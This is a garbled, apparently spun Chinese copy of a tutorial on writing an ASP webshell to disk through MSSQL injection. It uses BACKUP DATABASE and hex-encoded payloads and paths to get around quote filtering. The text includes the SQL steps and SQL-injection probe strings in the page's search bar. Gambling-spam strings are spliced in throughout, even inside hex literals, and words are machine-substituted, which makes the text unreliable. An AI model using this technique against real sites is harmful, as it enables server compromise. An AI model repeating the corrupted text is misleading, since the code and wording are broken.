快捷搜索:  as  test  1111  test aNd 8=8  test++aNd+8=8  as++aNd+8=8  as aNd 8=8

和记娱棒h88285:Mssql Backup a Shell 突破特殊字符



1.插入数据

mssql打针应用Backup或makewebtask获得webshell,在写入webshell代码和记娱棒h88285时,假如过滤了一些特殊字符,如" '等。我们先mssql阐发器里“查询”:

use pubs; ')

select * from cmd; 2.导前道路

老例的插入数据后导出webshell的语句为:

backup database model to disk='g:\wwwtest\l.asp';

显然导前道路里体贴了' : \等,我们照旧可以应用hex编码来冲破:

declare @a sysname

select @a=0x673A5C7777777465和记娱棒h8828573745C6C2E617370 3.小结:

结合1,2我们可以获得完备的导出webshell的sql语句款式为:

use model

create table cmd (str image)

insert into cmd(str) 和记娱棒h88285values(0x奸淫奸淫奸淫**)

declare @a sysname select @a=0x奸淫奸淫奸淫*和记娱棒h88285 backup database pubs to disk=@a;

着实应用hex等编码的措施,在angel的文章〈饶过'(单引号)限定和记娱棒h88285继承射入〉里提过,我只是照搬而已,你也可以搬到其他地方去拉:).

免责声明:以上内容源自网络,版权归原作者所有,如有侵犯您的原创版权请告知,我们将尽快删除相关内容。

您可能还会对下面的文章感兴趣: